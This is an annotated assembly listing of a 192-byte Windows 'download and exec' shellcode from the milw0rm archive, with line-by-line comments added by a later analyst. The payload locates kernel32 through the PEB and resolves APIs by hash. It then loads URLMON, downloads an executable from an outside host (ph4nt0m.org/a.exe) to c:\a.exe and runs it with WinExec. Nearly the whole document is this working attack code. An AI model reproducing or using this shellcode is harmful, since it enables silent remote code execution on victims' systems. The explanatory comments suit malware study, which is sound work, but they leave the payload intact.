win32 Tiny Download and Exec Shellcode 192 bytes by h3m4n


  1    ;Tiny Download&&Exec ShellCode codz czy 2007.6.1
  2    ;header 163=61(16+8+9+(28))+95(68+27)+17
  3    ;163+19=192
  4    comment %
  5                     #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#               #
  6                   # Tiny Download&&Exec ShellCode−−>         #           #
  7                #     −−>size 192                                 #   #
  8              #                       2007.06.01                    #
  9                #                     codz: czy                   #   #
  10               #                   www.ph4nt0m.org             #       #
  11                 #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−#            #
  12
  13   system :test on ie6+XPSP2/2003SP2/2kSP4
  14   %
  15   .586
  16   .model flat,stdcall
  17   option casemap:none
  18
  19   include      c:\masm32\include\windows.inc
  20   include      c:\masm32\include\kernel32.inc
  21   includelib   c:\masm32\lib\kernel32.lib
  22   include      c:\masm32\include\user32.inc
  23   includelib   c:\masm32\lib\user32.lib
  24
  25
  26   .data
  27   shelldatabuffer db 1024 dup(0)      ; not referenced anywhere in this listing
  28   shellcodebuffer db 2046 dup(0)      ; writable staging buffer the payload bytes are copied into and run from
  29   downshell        db ’down exploit’,0 ; caption and text of the MessageBox below (curly quotes are a rendering artifact of the listing)
  30   .code
       ; Test harness, not part of the 192-byte payload: shows a message box,
       ; copies 256 bytes from a hard-coded address into shellcodebuffer and
       ; jumps there.  Everything from @@shellcodebegin onward is the
       ; position-independent payload itself.
  31   start:
  32           invoke MessageBoxA,0,offset downshell,offset downshell,1   ; type 1 = MB_OKCANCEL; presumably a pause so a tester can attach a debugger -- confirm
  33           invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256 ; source address is hard-coded: assumes @@shellcodebegin lands at 00401040h in the built image, any layout change breaks the copy
  34           mov      eax,offset shellcodebuffer
  35           jmp      eax                ; executes out of .data; relies on that page being executable at runtime (DEP state is not shown here)
  36           somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h ; NOP padding in front of the payload
  37   ; (original comment is mis-encoded non-ASCII text, unreadable in this listing; the readable fragment says "shellcode")
  38   @@shellcodebegin:
       ; Get-PC idiom: CALL pushes the address of @@beginaddr; @@realshellcode
       ; pops it into EDI to reach the inline data table that follows.
  39           call     @@beginaddr
  40   @@beginaddr:
  41           PUSH 03H       ; count of kernel32 hashes resolved on the first pass (consumed by POP ECX / loop @@next2); original comment unreadable, readable fragment says "API"
  42           jmp      @@realshellcode    ; jump over the inline data below
       ; Inline data table.  Each dd holds a hash of an export name (the
       ; ROR-13/ADD scheme implemented at @@again) and is overwritten in place
       ; with the resolved address by STOSD.  Later accesses are relative to
       ; `path`: [path-18h] = myExitProcess, [path-14h] = myWinExec.
  43   myExitProcess      dd 073e2d87eh
  44   myWinExec          dd 00e8afe98h
  45   myLoadLibraryA     dd 0ec0e4e8eh      ; last of the first pass, so EAX still holds LoadLibraryA when the loop falls through
  46   dll                db ’URLMON’,0,0     ; 8 bytes; module name handed to LoadLibraryA
  47   myUrlDownFile      dd 0702f1a36h       ; resolved against URLMON on the second pass
  48   path              db ’c:\a.exe’,0               ; 9 bytes incl. NUL, so `url` sits at path+9 (see lea ecx,[edi+9h]); the leading 'c' is what cmp cl,'c' tests
  49   url               db ’http://www.ph4nt0m.org/a.exe’,0
  50
  51
  52
  53   @@realshellcode:
       ; Stack on entry (top first): 03h pushed at @@beginaddr, then the return
       ; address of the get-PC CALL, which equals @@beginaddr.
  54       POP ECX        ; ecx = 3, number of hashes for the first pass
  55       POP EDI        ; edi = @@beginaddr
  56       SCASD ;edi+4   ; skips PUSH 03H + short jmp (4 bytes) so edi points at myExitProcess; compare result ignored, DF assumed clear
       ; Find the kernel32.dll image base through the PEB loader lists.
       ; Analyst note: fs:[30h] -> Ldr -> init-order list -> export walk with a
       ; ROR-13 hash is the classic pattern; the hash constants above serve as
       ; static signatures for this payload.
  57   ; (original comment unreadable; readable fragment says "kernel32.dll")
  58   db 67h,64h,0A1h,30h,00h     ; mov eax, fs:[0030h] with a 16-bit address override (TEB.ProcessEnvironmentBlock); written as raw bytes, presumably for size or because MASM will not emit this form -- confirm
  59            mov eax, [eax+0cH]  ; PEB.Ldr
  60            mov esi, [eax+1cH]  ; Ldr.InInitializationOrderModuleList.Flink (first entry)
  61        lodsd                   ; eax = second entry in init order; kernel32.dll on the 2000/XP/2003 builds named in the header -- this ordering is why the payload is version-dependent
  62            mov ebp, [eax+08H]  ; ebp = DllBase of that entry; ebp is the module base for the export walk below (original comment unreadable, mentions EBP and kernel32.dll)
  63   ; (original comment unreadable)
       ; Export lookup by name hash.  @@next2 saves the counter, @@next3 walks
       ; one module's export names, @@next handles one name, @@again one
       ; character, @@end compares the finished hash with [edi].
  64   @@next2:
  65   PUSH       ECX              ; save remaining-hash counter across the lookup
  66   @@next3:                    ; second-pass entry (jmp @@next3): ebp and the pushed counter are already set up by the caller
  67   MOV        ESI,[EBP+3Ch]    ; e_lfanew
  68   MOV        ESI,[EBP+ESI+78h]; OptionalHeader.DataDirectory[0].VirtualAddress = export directory RVA
  69   ADD        ESI,EBP          ; -> IMAGE_EXPORT_DIRECTORY
  70   PUSH       ESI              ; keep the export directory VA for the ordinal/address tables
  71   MOV        ESI,[ESI+20h]    ; AddressOfNames RVA
  72   ADD        ESI,EBP
  73   XOR        ECX,ECX
  74   DEC        ECX              ; ecx = -1, name index (pre-incremented at @@next)
  75   @@next:
  76   INC        ECX
  77   LODSD                       ; eax = RVA of the next export name
  78   ADD        EAX,EBP          ; -> name string
  79   XOR        EBX,EBX          ; ebx = running hash
  80   @@again:
  81        MOVSX     EDX,BYTE PTR [EAX]
  82       CMP        DL,DH        ; dh is 0 for any 7-bit character, so this is a NUL-terminator test
  83       JZ         @@end
  84       ROR        EBX,0Dh      ; hash = ror(hash,13) + c, the scheme the dd constants were generated with
  85       ADD        EBX,EDX
  86       INC        EAX
  87       JMP        @@again
  88   @@end:
  89   CMP        EBX,[EDI]        ; compare with the hash edi currently points at
  90   JNZ        @@next           ; no NumberOfNames bound: an absent hash walks off the name table
  91
  92   POP      ESI                ; export directory VA
  93   MOV      EBX,[ESI+24h]      ; AddressOfNameOrdinals RVA
  94   ADD      EBX,EBP
  95   MOV      CX,WORD PTR [ECX*2+EBX]   ; ordinal for this name index; only cx is written, upper half of ecx is 0 because the index counted up from -1 and stays below 10000h
  96   MOV      EBX,[ESI+1Ch]      ; AddressOfFunctions RVA
  97   ADD      EBX,EBP
  98   MOV      EAX,[ECX*4+EBX]    ; function RVA
  99    ADD       EAX,EBP          ; eax = resolved function address
  100   STOSD                      ; overwrite the hash at [edi] with the address; edi += 4 -> next table slot
  101   POP       ECX              ; remaining count saved at @@next2
  102   loop @@next2               ; repeat for the next hash of the same module
  103
       ; After the kernel32 pass edi points at `dll`, after the URLMON pass at
       ; `path`; the first byte ('U' vs 'c') tells the two apart.  The trailing
       ; ;2 / ;3 annotations are presumably the author's per-instruction byte
       ; counts that feed the size tally in the file header.
  104   mov ecx,[edi]   ;2
  105   cmp cl,’c’      ;3         ; second pass finished -> download
  106   jz @@downfile   ;2
  107   PUSH EDI                   ; lpLibFileName = "URLMON"
  108   CALL EAX        ;2         ; eax = last address resolved = LoadLibraryA (third hash); returns the module base
  109   xchg eax,ebp               ; ebp = URLMON base, so the export walk now runs against urlmon.dll
  110   scasd                      ; skip the 8-byte "URLMON",0,0 string
  111   scasd                      ; edi -> myUrlDownFile
  112   push 01         ;2         ; one hash this pass; stands in for the PUSH ECX at @@next2 (original comment unreadable, readable fragment says "DLL")
  113   jmp @@next3     ;2
  114                   ; (original comment unreadable; trailing "17" is likely a byte count, matching the "+17" in the header tally)
  115
  116
  117   @@downfile:
       ; edx holds the terminator byte loaded by MOVSX in the hash loop, i.e. 0
       ; for a normal ASCII export name -- hence the ";0" pushes.  Push order
       ; matches stdcall URLDownloadToFileA(pCaller, szURL, szFileName,
       ; dwReserved, lpfnCB).
  118
  119           push    edx    ;0             ; lpfnCB
  120           push    edx    ;0             ; dwReserved
  121           push    edi    ;file=c:\a.exe ; szFileName (edi = path)
  122           lea     ecx,   dword ptr [edi+9h] ; url follows the 9-byte path string
  123           push    ecx    ;url           ; szURL
  124           push    edx    ;0             ; pCaller
  125           call    eax    ;URLDownloadToFileA,0,url,file=c:\a.exe,0,0   ; eax = address resolved on the URLMON pass; HRESULT is not checked
  126
  127
  128           push 1 ;FOR TEST              ; uCmdShow = SW_SHOWNORMAL
  129           push edi                      ; lpCmdLine = path
  130           call dword ptr [edi−14H] ;winexec,’c:\xxx.exe’,1   ; [path-14h] = myWinExec slot, now holding the resolved address (the minus sign is a rendering artifact of '-')
  131
  132       call dword ptr [edi−18H] ;Exitprocess   ; [path-18h] = myExitProcess slot; no uExitCode is pushed, so the exit code is whatever is on the stack
  133
  134       somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h   ; trailing NOP padding, not reached on the payload path
  135       invoke ExitProcess,0           ; harness fallback; only reached if control ever returns here
  136   end start
  137
  138   ; milw0rm.com [2007−06−27]





								
To top